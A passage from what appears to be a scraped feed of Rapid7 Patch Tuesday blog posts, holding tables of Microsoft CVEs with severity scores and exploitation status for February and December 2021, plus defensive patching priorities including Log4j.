No | Yes | 8.1 | Yes \n[CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>) | .NET Core Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n \n#### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24080>) | Windows Trust Verification API Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>) | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1734>) | Windows Remote Procedure Call Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-25195](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-25195>) | Windows PKU2U Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>) | Windows Local Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-24102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24102>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24103>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24083>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n#### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24085>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-1730](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1730>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 5.4 | Yes \n \n#### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1724>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 6.1 | No \n[CVE-2021-24101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24101>) | Microsoft Dataverse Information Disclosure Vulnerability | No | No | 6.5 | Yes \n \n#### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24073>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2021-24099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24099>) | Skype for Business and Lync Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24114>) | Microsoft Teams iOS Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1726>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-24072](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24072>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24066>) | Microsoft SharePoint Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24071](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24071>) | Microsoft SharePoint Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-24067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24067>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24068>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24069>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24070>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1728>) | System Center Operations Manager Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24092>) | Microsoft Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n#### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) | Windows Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-1698](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1698>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24075>) | Windows Network File System Denial of Service Vulnerability | No | No | 6.8 | No \n[CVE-2021-24084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24084>) | Windows Mobile Device Management Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24096>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>) | Windows DirectX Information Disclosure Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>) | Windows Console Driver Denial of Service Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>) | Windows Camera Codec Pack Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24079](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24079>) | Windows Backup Engine Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1731>) | PFX Encryption Security Feature Bypass Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24082>) | Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-24076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24076>) | Microsoft Windows VMSwitch Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>) | Microsoft Windows Codecs Library Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n### Summary Charts\n\n\n\n________Note: _______Chart_______ data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "cvss3": {}, "published": "2021-02-09T23:51:27", "type": "rapid7blog", "title": "Patch Tuesday - February 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2021-1639", "CVE-2021-1698", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1724", "CVE-2021-1726", "CVE-2021-1727", "CVE-2021-1728", "CVE-2021-1730", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-1734", "CVE-2021-21017", "CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-24066", "CVE-2021-24067", "CVE-2021-24068", "CVE-2021-24069", "CVE-2021-24070", "CVE-2021-24071", "CVE-2021-24072", "CVE-2021-24073", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24087", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24092", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24099", "CVE-2021-24100", "CVE-2021-24101", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24105", "CVE-2021-24106", "CVE-2021-24109", "CVE-2021-24111", "CVE-2021-24112", "CVE-2021-24113", "CVE-2021-24114", "CVE-2021-25195", "CVE-2021-26700", "CVE-2021-26701"], "modified": "2021-02-09T23:51:27", "id": "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "href": "https://blog.rapid7.com/2021/02/09/patch-tuesday-february-2021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-22T09:04:02", "description": "\n\nThis month\u2019s Patch Tuesday comes in the middle of a global effort to mitigate [Apache Log4j CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). In today\u2019s security release, Microsoft issued fixes for 83 vulnerabilities across an array of products \u2014 including a fix for Windows Defender for IoT, which is [vulnerable to CVE-2021-44228](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-iot/updated-13-dec-microsoft-defender-for-iot-security-advisory/m-p/3036844>) amongst seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected). Six CVEs in the bulletin have been publicly disclosed; the only vulnerability noted as being exploited in the wild in this month\u2019s release is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has evidently been used in Emotet malware campaigns.\n\nInterestingly, this round of fixes also includes [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a Windows Installer privilege escalation bug whose advisory is sparse despite the fact that it appears to affect all supported versions of Windows. While there\u2019s no indication in the advisory that the two vulnerabilities are related, CVE-2021-43883 looks an awful lot like the fix for [a zero-day vulnerability](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>) that made a splash in the security community last month after proof-of-concept exploit code was released and in-the-wild attacks began. The zero-day vulnerability, which researchers hypothesized was a patch bypass for CVE-2021-41379, allowed low-privileged attackers to overwrite protected files and escalate to SYSTEM. Rapid7\u2019s vulnerability research team did a full [root cause analysis](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=ptblog>) of the bug as attacks ramped up in November.\n\nAs usual, RCE flaws figure prominently in the \u201cCritical\u201d-rated CVEs this month. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the outsized risk presented by most vulnerable implementations of Log4Shell, administrators should prioritize patches for any products affected by CVE-2021-44228. Past that, put critical server-side and OS RCE patches at the top of your list, and we\u2019d advise sneaking in the fix for CVE-2021-43883 despite its lower severity rating. \n\n## Summary charts\n\n\n\n## Summary tables\n\n### Apps Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43890>) | Windows AppX Installer Spoofing Vulnerability | Yes | Yes | 7.1 | Yes \n[CVE-2021-43905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43905>) | Microsoft Office app Remote Code Execution Vulnerability | No | No | 9.6 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-4068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4068>) | Chromium: CVE-2021-4068 Insufficient validation of untrusted input in new tab page | No | No | N/A | Yes \n[CVE-2021-4067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4067>) | Chromium: CVE-2021-4067 Use after free in window manager | No | No | N/A | Yes \n[CVE-2021-4066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4066>) | Chromium: CVE-2021-4066 Integer underflow in ANGLE | No | No | N/A | Yes \n[CVE-2021-4065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4065>) | Chromium: CVE-2021-4065 Use after free in autofill | No | No | N/A | Yes \n[CVE-2021-4064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4064>) | Chromium: CVE-2021-4064 Use after free in screen capture | No | No | N/A | Yes \n[CVE-2021-4063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4063>) | Chromium: CVE-2021-4063 Use after free in developer tools | No | No | N/A | Yes \n[CVE-2021-4062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4062>) | Chromium: CVE-2021-4062 Heap buffer overflow in BFCache | No | No | N/A | Yes \n[CVE-2021-4061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4061>) | Chromium: CVE-2021-4061 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2021-4059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4059>) | Chromium: CVE-2021-4059 Insufficient data validation in loader | No | No | N/A | Yes \n[CVE-2021-4058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4058>) | Chromium: CVE-2021-4058 Heap buffer overflow in ANGLE | No | No | N/A | Yes \n[CVE-2021-4057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4057>) | Chromium: CVE-2021-4057 Use after free in file API | No | No | N/A | Yes \n[CVE-2021-4056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4056>) | Chromium: CVE-2021-4056: Type Confusion in loader | No | No | N/A | Yes \n[CVE-2021-4055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4055>) | Chromium: CVE-2021-4055 Heap buffer overflow in extensions | No | No | N/A | Yes \n[CVE-2021-4054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4054>) | Chromium: CVE-2021-4054 Incorrect security UI in autofill | No | No | N/A | Yes \n[CVE-2021-4053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4053>) | Chromium: CVE-2021-4053 Use after free in UI | No | No | N/A | Yes \n[CVE-2021-4052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4052>) | Chromium: CVE-2021-4052 Use after free in web apps | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43907>) | Visual Studio Code WSL Extension Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-43908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43908>) | Visual Studio Code Spoofing Vulnerability | No | No | nan | No \n[CVE-2021-43891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43891>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43896>) | Microsoft PowerShell Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-43892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43892>) | Microsoft BizTalk ESB Toolkit Spoofing Vulnerability | No | No | 7.4 | No \n[CVE-2021-43225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43225>) | Bot Framework SDK Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-43877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43877>) | ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n### Device Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43899>) | Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n \n### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-42295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42295>) | Visual Basic for Applications Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-42320](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42320>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-43242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43242>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-42309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42309>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42294>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2021-43255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43255>) | Microsoft Office Trust Center Spoofing Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43875>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-42293](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42293>) | Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-43256](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43256>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43882>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2021-42311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42311>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42313>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42314>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42315>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-41365](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41365>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42310>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-43889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43889>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2021-43888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43888>) | Microsoft Defender for IoT Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-42312](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42312>) | Microsoft Defender for IOT Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43247](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43247>) | Windows TCP/IP Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43237](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43237>) | Windows Setup Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43239](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43239>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-43231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43231>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43880>) | Windows Mobile Device Management Elevation of Privilege Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-43244](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43244>) | Windows Kernel Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-43246](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43246>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 5.6 | No \n[CVE-2021-43232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43232>) | Windows Event Tracing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43248>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43214>) | Web Media Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-43243](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43243>) | VP9 Video Extensions Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43228](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43228>) | SymCrypt Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-43227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43227>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43235](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43235>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43240](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43240>) | NTFS Set Short Name Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-40452](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40452>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40453>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-41360](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41360>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-43219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43219>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 7.4 | No \n \n### Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43215>) | iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution | No | No | 9.8 | Yes \n[CVE-2021-43238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43238>) | Windows Remote Access Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43223>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41333](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41333>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-43229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43229>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43230>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40441>) | Windows Media Center Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43883>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-43234](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43234>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43217](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43217>) | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-43893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43893>) | Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability | No | Yes | 7.5 | No \n[CVE-2021-43245](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43245>) | Windows Digital TV Tuner Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43224](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43224>) | Windows Common Log File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43226>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43207>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No 